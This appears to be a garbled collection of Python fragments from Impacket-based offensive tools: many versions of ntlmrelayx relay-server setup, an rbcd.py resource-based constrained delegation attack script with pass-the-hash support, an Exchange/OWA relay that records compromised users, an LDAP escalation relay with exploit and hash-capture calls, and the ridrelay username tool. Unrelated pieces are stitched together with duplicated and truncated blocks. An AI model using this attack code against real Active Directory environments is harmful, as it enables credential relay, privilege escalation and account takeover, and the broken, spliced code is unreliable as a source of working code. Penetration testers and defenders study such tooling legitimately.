def __init__(self):
NTLMRelayxConfig.__init__(self)
# Auth options
self.dcip = None
self.aeskey = None
self.hashes = None
self.password = None
self.israwpassword = False
self.salt = None
# Krb options
self.format = 'ccache'
# LDAP options
self.dumpdomain = True
self.addda = True
self.aclattack = True
self.validateprivs = True
self.escalateuser = None
self.addcomputer = False
self.delegateaccess = False
# Custom options
self.victim = None
def __init__(self):
NTLMRelayxConfig.__init__(self)
# Auth options
self.dcip = None
self.aeskey = None
self.hashes = None
self.password = None
self.israwpassword = False
self.salt = None
# Krb options
self.format = 'ccache'
def start_servers(options, threads):
for server in RELAY_SERVERS:
#Set up config
c = NTLMRelayxConfig()
c.setProtocolClients(PROTOCOL_CLIENTS)
c.setRunSocks(options.socks, socksServer)
c.setTargets(targetSystem)
c.setExeFile(options.e)
c.setCommand(options.c)
c.setEnumLocalAdmins(options.enum_local_admins)
c.setEncoding(codec)
c.setMode(mode)
c.setAttacks(PROTOCOL_ATTACKS)
c.setLootdir(options.lootdir)
c.setOutputFile(options.output_file)
c.setLDAPOptions(options.no_dump, options.no_da, options.no_acl, options.escalate_user)
c.setMSSQLOptions(options.query)
c.setInteractive(options.interactive)
c.setIMAPOptions(options.keyword, options.mailbox, options.all, options.imap_max)
c.setIPv6(options.ipv6)
c.setWpadOptions(options.wpad_host, options.wpad_auth_num)
c.setSMB2Support(options.smb2support)
c.setInterfaceIp(options.interface_ip)
#If the redirect option is set, configure the HTTP server to redirect targets to SMB
if server is HTTPRelayServer and options.r is not None:
c.setMode('REDIRECT')
c.setRedirectHost(options.r)
#Use target randomization if configured and the server is not SMB
#SMB server at the moment does not properly store active targets so selecting them randomly will cause issues
if server is not SMBRelayServer and options.random:
c.setRandomTargets(True)
s = server(c)
s.start()
threads.add(s)
return c
logging.info("Running HTTP server in redirect mode")
if targetSystem is not None and options.w:
watchthread = TargetsFileWatcher(targetSystem)
watchthread.start()
if options.socks is True:
# Start a SOCKS proxy in the background
s = SOCKS()
socks_thread = Thread(target=s.serve_forever)
socks_thread.daemon = True
socks_thread.start()
for server in RELAY_SERVERS:
#Set up config
c = NTLMRelayxConfig()
c.setRunSocks(options.socks)
c.setTargets(targetSystem)
c.setExeFile(options.e)
c.setCommand(options.c)
c.setEncoding(codec)
c.setMode(mode)
c.setAttacks(ATTACKS)
c.setLootdir(options.lootdir)
c.setOutputFile(options.output_file)
c.setLDAPOptions(options.no_dump,options.no_da)
c.setMSSQLOptions(options.query)
c.setInteractive(options.interactive)
c.setIMAPOptions(options.keyword,options.mailbox,options.all,options.imap_max)
c.setIPv6(options.ipv6)
c.setWpadOptions(options.wpad_host, options.wpad_auth_num)
def start_servers(options, threads):
for server in RELAY_SERVERS:
#Set up config
c = NTLMRelayxConfig()
c.setProtocolClients(PROTOCOL_CLIENTS)
c.setRunSocks(options.socks, socksServer)
c.setTargets(targetSystem)
c.setExeFile(options.e)
c.setCommand(options.c)
c.setEnumLocalAdmins(options.enum_local_admins)
c.setDisableMulti(options.no_multirelay)
c.setEncoding(codec)
c.setMode(mode)
c.setAttacks(PROTOCOL_ATTACKS)
c.setLootdir(options.lootdir)
c.setOutputFile(options.output_file)
c.setLDAPOptions(options.no_dump, options.no_da, options.no_acl,
options.no_validate_privs, options.escalate_user,
options.add_computer, options.delegate_access,
options.dump_laps, options.dump_gmsa,
options.dump_adcs, options.sid)
c.setRPCOptions(options.rpc_mode, options.rpc_use_smb,
options.auth_smb, options.hashes_smb,
options.rpc_smb_port)
c.setMSSQLOptions(options.query)
c.setInteractive(options.interactive)
c.setIMAPOptions(options.keyword, options.mailbox, options.all,
options.imap_max)
c.setIPv6(options.ipv6)
c.setWpadOptions(options.wpad_host, options.wpad_auth_num)
c.setSMB2Support(options.smb2support)
c.setSMBChallenge(options.ntlmchallenge)
c.setInterfaceIp(options.interface_ip)
c.setExploitOptions(options.remove_mic, options.remove_target)
c.setWebDAVOptions(options.serve_image)
c.setIsADCSAttack(options.adcs)
c.setADCSOptions(options.template)
c.setIsShadowCredentialsAttack(options.shadow_credentials)
c.setShadowCredentialsOptions(options.shadow_target,
options.pfx_password,
options.export_type,
options.cert_outfile_path)
c.setAltName(options.altname)
#If the redirect option is set, configure the HTTP server to redirect targets to SMB
if server is HTTPRelayServer and options.r is not None:
c.setMode('REDIRECT')
c.setRedirectHost(options.r)
#Use target randomization if configured and the server is not SMB
if server is not SMBRelayServer and options.random:
c.setRandomTargets(True)
if server is HTTPRelayServer:
c.setDomainAccount(options.machine_account, options.machine_hashes,
options.domain)
for port in options.http_port:
c.setListeningPort(port)
s = server(c)
s.start()
threads.add(s)
sleep(0.1)
continue
elif server is SMBRelayServer:
c.setListeningPort(options.smb_port)
elif server is WCFRelayServer:
c.setListeningPort(options.wcf_port)
elif server is RAWRelayServer:
c.setListeningPort(options.raw_port)
s = server(c)
s.start()
threads.add(s)
return c
import ldap3
import ldapdomaindump
from impacket import logging
from impacket.examples import logger
from impacket.examples.ntlmrelayx.attacks.ldapattack import LDAPAttack
from impacket.examples.ntlmrelayx.utils.config import NTLMRelayxConfig
attackeraccount = ('DOMAIN\\USER', 'PASSWORD')
fakecomputer = 'FAKE_COMPUTER_NAME'
targetcomputer = 'TARGET_COMPUTER_NAME'
dc = 'DC_IP'
targetsam = '{}$'.format(targetcomputer)
fakecomputersam = '{}$'.format(fakecomputer)
c = NTLMRelayxConfig()
c.addcomputer = fakecomputer
c.target = dc
logger.init()
logging.getLogger().setLevel(logging.INFO)
logging.info('Starting Resource Based Constrained Delegation Attack against {}'.format(targetsam))
logging.info('Initializing LDAP connection to {}'.format(dc))
#tls = ldap3.Tls(validate=ssl.CERT_NONE, version=ssl.PROTOCOL_TLSv1_2)
serv = ldap3.Server(dc, tls=False, get_info=ldap3.ALL)
logging.info('Using {} account with password ***'.format(attackeraccount[0]))
conn = ldap3.Connection(serv, user=attackeraccount[0], password=attackeraccount[1], authentication=ldap3.SIMPLE)
conn.bind()
logging.info('LDAP bind OK')
action='store',
help=
'domain\\username:password, attacker account with write access to target computer properties (NetBIOS domain name must be used!)'
)
if len(sys.argv) == 1:
parser.print_help()
print(
'\nExample: ./rbcd.py -dc-ip 10.10.10.1 -t WEB -f FAKECOMP ECORP\\test:Spring2020'
)
sys.exit(1)
options = parser.parse_args()
attackeraccount = options.identity.split(':')
c = NTLMRelayxConfig()
c.addcomputer = options.f
c.target = options.dc_ip
if options.hashes:
# support only :NTHASH format (no LM)
attackerpassword = ("aad3b435b51404eeaad3b435b51404ee:" +
options.hashes.split(":")[1]).upper()
else:
attackerpassword = attackeraccount[1]
logger.init()
logging.getLogger().setLevel(logging.INFO)
logging.info(
'Starting Resource Based Constrained Delegation Attack against {}$'.format(
options.t))
def startServers(targetURL,
interface,
hashOutputFile=None,
serverIP="127.0.0.1",
serverPort=8000):
PoppedDB = Manager().dict() # A dict of PoppedUsers
PoppedDB_Lock = Lock() # A lock for opening the dict
relayServers = (SMBRelayServer, HTTPRelayServer)
serverThreads = []
C_Attack = {"HTTPS": ExchangePlugin}
for server in relayServers:
c = NTLMRelayxConfig()
c.setProtocolClients({"HTTPS": HTTPSRelayClient})
c.setTargets(TargetsProcessor(singleTarget=str(targetURL + "/")))
c.setOutputFile(hashOutputFile)
c.setMode('RELAY')
c.setAttacks(C_Attack)
c.setInterfaceIp(interface)
c.PoppedDB = PoppedDB # pass the poppedDB to the relay servers
c.PoppedDB_Lock = PoppedDB_Lock # pass the poppedDB to the relay servers
s = server(c)
s.start()
serverThreads.append(s)
logging.info("Relay servers started")
# Now start the WebUI on 127.0.0.1:8000
owa = Thread(target=OWAServer.runServer,
args=(
serverIP,
serverPort,
PoppedDB,
PoppedDB_Lock,
))
owa.daemon = True
owa.start()
try:
while owa.isAlive():
pass
except KeyboardInterrupt, e:
logging.info("Shutting down...")
for thread in serverThreads:
thread.server.shutdown()
watchthread.start()
threads = set()
socksServer = None
if options.socks is True:
# Start a SOCKS proxy in the background
socksServer = SOCKS()
socksServer.daemon_threads = True
socks_thread = Thread(target=socksServer.serve_forever)
socks_thread.daemon = True
socks_thread.start()
threads.add(socks_thread)
for server in RELAY_SERVERS:
#Set up config
c = NTLMRelayxConfig()
c.setProtocolClients(PROTOCOL_CLIENTS)
c.setRunSocks(options.socks, socksServer)
c.setTargets(targetSystem)
c.setExeFile(options.e)
c.setCommand(options.c)
c.setEncoding(codec)
c.setMode(mode)
c.setAttacks(ATTACKS)
c.setLootdir(options.lootdir)
c.setOutputFile(options.output_file)
c.setLDAPOptions(options.no_dump, options.no_da)
c.setMSSQLOptions(options.query)
c.setInteractive(options.interactive)
c.setIMAPOptions(options.keyword, options.mailbox, options.all,
options.imap_max)
#print targetSystem.targets
if targetSystem is not None and options.w:
watchthread = TargetsFileWatcher(targetSystem)
watchthread.start()
if options.lootdir is not None:
lootdir = options.lootdir
else:
lootdir = '.'
exeFile = options.e
Command = options.c
for server in RELAY_SERVERS:
#Set up config
c = NTLMRelayxConfig()
c.setTargets(targetSystem)
c.setExeFile(exeFile)
c.setCommand(Command)
c.setMode(mode)
c.setAttacks(ATTACKS)
c.setLootdir(lootdir)
c.setOutputFile(options.output_file)
c.setLDAPOptions(options.no_dump, options.no_da)
c.setMSSQLOptions(options.query)
c.setInteractive(options.interactive)
#If the redirect option is set, configure the HTTP server to redirect targets to SMB
if server is HTTPRelayServer and options.r is not None:
c.setMode('REDIRECT')
c.setRedirectHost(options.r)
watchthread.start()
if options.lootdir is not None:
lootdir = options.lootdir
else:
lootdir = '.'
#Temp
#mode = 'TRANSPARENT'
exeFile = options.e
Command = options.c
for server in RELAY_SERVERS:
#Set up config
c = NTLMRelayxConfig()
c.setTargets(targetSystem)
c.setExeFile(exeFile)
c.setCommand(Command)
c.setMode(mode)
c.setAttacks(ATTACKS)
c.setLootdir(lootdir)
c.setOutputFile(options.output_file)
#If the redirect option is set, configure the HTTP server to redirect targets to SMB
if server is HTTPRelayServer and options.r is not None:
c.setMode('REDIRECT')
c.setRedirectHost(options.r)
if options.machine_account is not None and options.machine_hashes is not None and options.domain is not None:
c.setDomainAccount( options.machine_account, options.machine_hashes, options.domain)
def startServers(passargs):
targetSystem = passargs.target_host
privuser = passargs.user
PoppedDB = Manager().dict() # A dict of PoppedUsers
PoppedDB_Lock = Lock() # A lock for opening the dict
relayServers = (SMBRelayServer, HTTPRelayServer)
serverThreads = []
for server in relayServers:
c = NTLMRelayxConfig()
c.setProtocolClients(PROTOCOL_CLIENTS)
c.setTargets(
TargetsProcessor(singleTarget=str("ldap://" + targetSystem),
protocolClients=PROTOCOL_CLIENTS))
c.setOutputFile(None)
c.setEncoding('ascii')
c.setMode('RELAY')
c.setAttacks(PROTOCOL_ATTACKS)
c.setLootdir('.')
c.setInterfaceIp("0.0.0.0")
c.setLDAPOptions(True, True, True, privuser)
c.PoppedDB = PoppedDB # pass the poppedDB to the relay servers
c.PoppedDB_Lock = PoppedDB_Lock # pass the poppedDB to the relay servers
s = server(c)
s.start()
serverThreads.append(s)
logging.info("Relay servers started, waiting for connection....")
status = exploit(passargs)
if status:
exp = Thread(target=gethash, args=(passargs, ))
exp.daemon = True
exp.start()
try:
while exp.isAlive():
pass
except KeyboardInterrupt, e:
logging.info("Shutting down...")
for thread in serverThreads:
thread.server.shutdown()
def start_servers(options, threads):
for server in RELAY_SERVERS:
#Set up config
c = NTLMRelayxConfig()
c.setProtocolClients(PROTOCOL_CLIENTS)
c.setRunSocks(options.socks, socksServer)
c.setTargets(targetSystem)
c.setExeFile(options.e)
c.setCommand(options.c)
c.setEnumLocalAdmins(options.enum_local_admins)
c.setEncoding(codec)
c.setMode(mode)
c.setAttacks(PROTOCOL_ATTACKS)
c.setLootdir(options.lootdir)
c.setOutputFile(options.output_file)
c.setLDAPOptions(options.no_dump, options.no_da, options.no_acl,
options.no_validate_privs, options.escalate_user,
options.add_computer, options.delegate_access,
options.dump_laps, options.dump_gmsa, options.sid)
c.setRPCOptions(options.rpc_mode, options.rpc_use_smb,
options.auth_smb, options.hashes_smb,
options.rpc_smb_port)
c.setMSSQLOptions(options.query)
c.setInteractive(options.interactive)
c.setIMAPOptions(options.keyword, options.mailbox, options.all,
options.imap_max)
c.setIPv6(options.ipv6)
c.setWpadOptions(options.wpad_host, options.wpad_auth_num)
c.setSMB2Support(options.smb2support)
c.setInterfaceIp(options.interface_ip)
c.setExploitOptions(options.remove_mic, options.remove_target)
c.setWebDAVOptions(options.serve_image)
c.setNamedPipeOptions(options.np_name, options.np_payload,
options.np_pid)
if server is HTTPRelayServer:
c.setListeningPort(options.http_port)
c.setDomainAccount(options.machine_account, options.machine_hashes,
options.domain)
elif server is SMBRelayServer:
c.setListeningPort(options.smb_port)
#If the redirect option is set, configure the HTTP server to redirect targets to SMB
if server is HTTPRelayServer and options.r is not None:
c.setMode('REDIRECT')
c.setRedirectHost(options.r)
#Use target randomization if configured and the server is not SMB
if server is not SMBRelayServer and options.random:
c.setRandomTargets(True)
s = server(c)
s.start()
threads.add(s)
return c
def start_servers(options, threads):
for server in RELAY_SERVERS:
#Set up config
c = NTLMRelayxConfig()
c.setProtocolClients(PROTOCOL_CLIENTS)
c.setRunSocks(options.socks, socksServer)
c.setTargets(targetSystem)
c.setExeFile(options.e)
c.setCommand(options.c)
c.setEnumLocalAdmins(options.enum_local_admins)
c.setEncoding(codec)
c.setMode(mode)
c.setAttacks(PROTOCOL_ATTACKS)
c.setLootdir(options.lootdir)
c.setOutputFile(options.output_file)
c.setLDAPOptions(options.no_dump, options.no_da, options.no_acl,
options.no_validate_privs, options.escalate_user,
options.add_computer, options.delegate_access)
c.setMSSQLOptions(options.query)
c.setInteractive(options.interactive)
c.setIMAPOptions(options.keyword, options.mailbox, options.all,
options.imap_max)
c.setIPv6(options.ipv6)
c.setWpadOptions(options.wpad_host, options.wpad_auth_num)
c.setSMB2Support(options.smb2support)
c.setInterfaceIp(options.interface_ip)
if server is HTTPRelayServer:
c.setListeningPort(options.http_port)
elif server is SMBRelayServer:
c.setListeningPort(options.smb_port)
#If the redirect option is set, configure the HTTP server to redirect targets to SMB
if server is HTTPRelayServer and options.r is not None:
c.setMode('REDIRECT')
c.setRedirectHost(options.r)
#Use target randomization if configured and the server is not SMB
#SMB server at the moment does not properly store active targets so selecting them randomly will cause issues
if server is not SMBRelayServer and options.random:
c.setRandomTargets(True)
s = server(c)
s.start()
threads.add(s)
return c
watchthread.start()
if options.lootdir is not None:
lootdir = options.lootdir
else:
lootdir = '.'
#Temp
#mode = 'TRANSPARENT'
exeFile = options.e
Command = options.c
for server in RELAY_SERVERS:
#Set up config
c = NTLMRelayxConfig()
c.setTargets(targetSystem)
c.setExeFile(exeFile)
c.setCommand(Command)
c.setMode(mode)
c.setAttacks(ATTACKS)
c.setLootdir(lootdir)
c.setOutputFile(options.output_file)
#If the redirect option is set, configure the HTTP server to redirect targets to SMB
if server is HTTPRelayServer and options.r is not None:
c.setMode('REDIRECT')
c.setRedirectHost(options.r)
if options.machine_account is not None and options.machine_hashes is not None and options.domain is not None:
c.setDomainAccount(options.machine_account, options.machine_hashes,
logger.init()
print 'ridrelay v0.2 - Get domain usernames by relaying low priv creds!\n'
logging.getLogger().setLevel(logging.INFO)
logging.getLogger('impacket.smbserver').setLevel(logging.ERROR)
codec = sys.getdefaultencoding()
targetSystem = TargetsProcessor(singleTarget=args.target,
protocolClients=PROTOCOL_CLIENTS)
threads = set()
for server in RELAY_SERVERS:
# Set up config
c = NTLMRelayxConfig()
c.setProtocolClients(PROTOCOL_CLIENTS)
c.setRunSocks(False, None)
c.setTargets(targetSystem)
c.setEncoding(codec)
c.setAttacks(ATTACKS)
c.setOutputFile(args.out_file)
c.setSMB2Support(True)
c.setInterfaceIp('')
if server == HTTPRelayServer:
c.setMode('REFLECTION')
else:
c.setMode('REDIRECT')
c.setRedirectHost(True)
s = server(c)
mode = "RELAY"
else:
logging.info("Running in reflection mode")
targetSystem = None
mode = "REFLECTION"
if options.r is not None:
logging.info("Running HTTP server in redirect mode")
if targetSystem is not None and options.w:
watchthread = TargetsFileWatcher(targetSystem)
watchthread.start()
for server in RELAY_SERVERS:
# Set up config
c = NTLMRelayxConfig()
c.setTargets(targetSystem)
c.setExeFile(options.e)
c.setCommand(options.c)
c.setMode(mode)
c.setAttacks(ATTACKS)
c.setLootdir(options.lootdir)
c.setOutputFile(options.output_file)
c.setLDAPOptions(options.no_dump, options.no_da)
c.setMSSQLOptions(options.query)
c.setInteractive(options.interactive)
c.setIMAPOptions(options.keyword, options.mailbox, options.all, options.imap_max)
# If the redirect option is set, configure the HTTP server to redirect targets to SMB
if server is HTTPRelayServer and options.r is not None:
c.setMode("REDIRECT")
